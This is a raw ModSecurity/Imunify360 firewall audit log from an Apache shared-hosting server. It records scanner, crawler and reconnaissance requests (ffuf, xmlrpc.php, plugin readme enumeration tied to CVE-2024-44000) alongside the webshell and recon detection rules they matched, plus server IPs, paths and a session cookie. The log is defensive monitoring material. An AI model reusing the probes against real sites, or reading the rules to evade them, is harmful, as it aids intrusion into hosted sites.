Server: Apache Engine-Mode: "ENABLED" --029adf45-Z-- --b15d2217-A-- [30/Jun/2025:17:15:09.338155 +0530] aGJ4xXSMlpA25H3D5i_xaQAAAAc 57.141.0.10 47674 192.168.74.40 443 --b15d2217-B-- GET /rajasthan-tours-from-Delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/rajasthan-tours-from-delhi/rajasthan-tours-from-jaipur/Rajasthan-Travel-Guides/images/testimonials/rajasthan-tours-from-ahmedabad/shipping.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --b15d2217-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b15d2217-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --788c4653-Z-- --6eab6a46-A-- [30/Jun/2025:17:26:09.563468 +0530] aGJ7WfloTDMmBQkEBah8gAAAABA 43.165.189.206 33146 192.168.74.40 80 --6eab6a46-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --6eab6a46-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --6eab6a46-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751284569556808 6974 (- - -) Stopwatch2: 1751284569556808 6974; combined=4049, p1=100, p2=3728, p3=89, p4=2, p5=130, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6eab6a46-Z-- --ef1c9260-A-- [30/Jun/2025:17:26:11.893006 +0530] aGJ7Wzfx-NT2h58atWKymgAAADs 13.74.177.36 8250 192.168.74.40 80 --ef1c9260-B-- GET /xmlrpc.php HTTP/1.1 Host: wiretronicindia.com --ef1c9260-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --ef1c9260-H-- Message: String match "xmlrpc.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "166"] [id "77141064"] [msg "IM360 WAF: CMS Recon Bot detected||MVN:REQUEST_FILENAME||RSV:7.05||RS:0||T:APACHE||MV:/xmlrpc.php||RM:GET||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751284571885848 7206 (- - -) Stopwatch2: 1751284571885848 7206; combined=4445, p1=111, p2=4137, p3=89, p4=2, p5=105, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d020c471-Z-- --85442170-A-- [30/Jun/2025:17:45:12.799426 +0530] aGJ_zzFfkq5jzVmPtS2JYAAAAC0 185.126.81.110 60528 192.168.74.40 443 --85442170-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Fuzz Faster U Fool v2.1.0-dev Accept-Encoding: gzip --85442170-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --85442170-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "23"] [id "77210801"] [msg "IM360 WAF: Request Indicates a Security Scanner Scanned the Site||MV:Fuzz Faster U Fool v2.1.0-dev||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751285711886430 913086 (- - -) Stopwatch2: 1751285711886430 913086; combined=3920, p1=115, p2=3606, p3=0, p4=0, p5=198, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --85442170-Z-- --61249614-A-- [30/Jun/2025:17:45:13.108980 +0530] aGJ_0eBhWXSkRVAiPA2k7QAAAAo 20.171.207.232 58466 192.168.74.40 443 --61249614-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/https/rajasthan-destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61249614-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61249614-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/https/rajasthan-destinations.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/https/rajasthan-destinations.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751285713057553 51484 (- - -) Stopwatch2: 1751285713057553 51484; combined=3250, p1=130, p2=2999, p3=0, p4=0, p5=121, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751286287867165 13724 (- - -) Stopwatch2: 1751286287867165 13724; combined=2691, p1=126, p2=2417, p3=0, p4=0, p5=148, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --85edbc04-Z-- --0211d735-A-- [30/Jun/2025:17:54:48.495399 +0530] aGKCEGC9nWX22sQcnyASIQAAAAw 103.185.74.40 57279 192.168.74.40 80 --0211d735-B-- GET /server-status?auto HTTP/1.1 User-Agent: Zabbix 6.4.19 Host: 103.185.74.40 Accept: */* Accept-Encoding: deflate, gzip --0211d735-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --0211d735-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:GET||Perf all:combined=100, p1=100, p2=0, p3=0, p4=0, p5=0, sr=0, sw=0, l=0, gc=0||Py scan:||Lua scan:||RBL:||RSV:7.05||RS:403||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Error: [file "mod_access_compat.c"] [line 353] [level 3] AH01797: client denied by server configuration: /var/www/html/server-status Apache-Handler: default-handler Stopwatch: 1751286288493045 2436 (- - -) Stopwatch2: 1751286288493045 2436; combined=301, p1=100, p2=0, p3=0, p4=0, p5=201, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0211d735-Z-- --da2aaf2f-A-- [30/Jun/2025:17:54:49.047444 +0530] aGKCEV6tVqfgFHsytjnjRwAAABU 20.171.207.232 58550 192.168.74.40 443 --da2aaf2f-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --da2aaf2f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --da2aaf2f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/privacy-policy.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751286289033950 13564 (- - -) Stopwatch2: 1751286289033950 13564; combined=2971, p1=113, p2=2729, p3=0, p4=0, p5=128, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287515374834 16688 (- - -) Stopwatch2: 1751287515374834 16688; combined=3288, p1=205, p2=2932, p3=0, p4=0, p5=151, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a15a675a-Z-- --11201f5b-A-- [30/Jun/2025:18:15:15.786219 +0530] aGKG2vy6sFD6VYPnzdBtEgAAADo 103.185.74.40 28606 192.168.74.40 443 --11201f5b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --11201f5b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --11201f5b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287514516293 1270444 (- - -) Stopwatch2: 1751287514516293 1270444; combined=2656, p1=86, p2=2404, p3=0, p4=0, p5=165, sr=49, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --11201f5b-Z-- --d5278978-A-- [30/Jun/2025:18:15:16.582355 +0530] aGKG3DxiIg4eTvHnHDY_PQAAAA4 20.171.207.232 59246 192.168.74.40 443 --d5278978-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/https/js/images/payment-mode.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d5278978-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d5278978-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287520228018 10382 (- - -) Stopwatch2: 1751287520228018 10382; combined=6312, p1=134, p2=5794, p3=190, p4=4, p5=189, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2299ee69-Z-- --f0b1980d-A-- [30/Jun/2025:18:15:20.612229 +0530] aGKG2_20RS0_FcVVhuGXlgAAAAY 103.185.74.40 9666 192.168.74.40 443 --f0b1980d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --f0b1980d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f0b1980d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287515998273 4614608 (- - -) Stopwatch2: 1751287515998273 4614608; combined=3732, p1=214, p2=3298, p3=0, p4=0, p5=220, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f0b1980d-Z-- --af506f59-A-- [30/Jun/2025:18:15:21.265288 +0530] aGKG4TxiIg4eTvHnHDY_QQAAAA4 20.171.207.232 59246 192.168.74.40 443 --af506f59-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/https/js/images/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --af506f59-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --af506f59-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6cf1cc43-Z-- --a1fb9b48-A-- [30/Jun/2025:18:49:47.199388 +0530] aGKO8xipZgxxI7e1HiAwRAAAAGc 67.205.152.1 59354 192.168.74.40 80 --a1fb9b48-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --a1fb9b48-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --a1fb9b48-H-- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1820"] [id "77350190"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "readme.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1827"] [id "77350589"] [msg "IM360 WAF: WordPress plugins/themes version enumeration using readme.txt||MV:/wp-content/plugins/litespeed-cache/readme.txt||User:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "/wp-content/plugins/litespeed-cache/readme.txt" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "2221"] [id "77350639"] [msg "IM360 WAF: Suspicious access attempt to WordPress debug.log (CVE-2024-44000)||MV:/wp-content/plugins/litespeed-cache/readme.txt||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] Apache-Handler: default-handler Stopwatch: 1751289587189567 10227 (- - -) Stopwatch2: 1751289587189567 10227; combined=5229, p1=125, p2=4952, p3=0, p4=0, p5=152, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a1fb9b48-Z-- --bfe56a55-A-- [30/Jun/2025:18:49:49.206176 +0530] aGKO9Edop-Fnku7mMXz9OgAAACU 67.205.152.1 58720 192.168.74.40 80 --bfe56a55-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: novemsol.com User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --bfe56a55-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://novemsol.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: PHPSESSID=4f5204324008b8262f8fb12cb56d20cc; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --331fde13-Z-- --153e933d-A-- [30/Jun/2025:18:55:01.806875 +0530] aGKQLUze9ZS5Sepg3lsyLgAAAF8 43.157.149.188 33622 192.168.74.40 80 --153e933d-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --153e933d-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --153e933d-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751289901795386 11982 (- - -) Stopwatch2: 1751289901795386 11982; combined=6491, p1=142, p2=5969, p3=185, p4=3, p5=191, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --153e933d-Z-- --b4ab491c-A-- [30/Jun/2025:18:55:02.743306 +0530] aGKQLvm8TUQuUKyjW7kwtwAAAFo 57.141.0.26 60186 192.168.74.40 443 --b4ab491c-B-- GET /rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/rajasthan-tours-from-udaipur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/images/rajasthan-tours-from-ahmedabad/index.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --b4ab491c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b4ab491c-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/rajasthan-tours-from-udaipur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/images/rajasthan-tours-from-ahmedabad/index.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751291135717459 43924 (- - -) Stopwatch2: 1751291135717459 43924; combined=16346, p1=182, p2=15430, p3=324, p4=8, p5=401, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1e7f3a3d-Z-- --05d4ca51-A-- [30/Jun/2025:19:15:39.052970 +0530] aGKVAU2IbV2Kf1hwDId9awAAACE 103.185.74.40 61692 192.168.74.40 443 --05d4ca51-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --05d4ca51-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --05d4ca51-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751291137854949 1198509 (- - -) Stopwatch2: 1751291137854949 1198509; combined=4432, p1=181, p2=4051, p3=0, p4=0, p5=199, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05d4ca51-Z-- --e90c831c-A-- [30/Jun/2025:19:15:40.489755 +0530] aGKVA-7n3O1Jy2lfkG6PQgAAAAA 103.185.74.40 1047 192.168.74.40 443 --e90c831c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e90c831c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e90c831c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751291139265196 1224969 (- - -) Stopwatch2: 1751291139265196 1224969; combined=2861, p1=106, p2=2576, p3=0, p4=0, p5=178, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
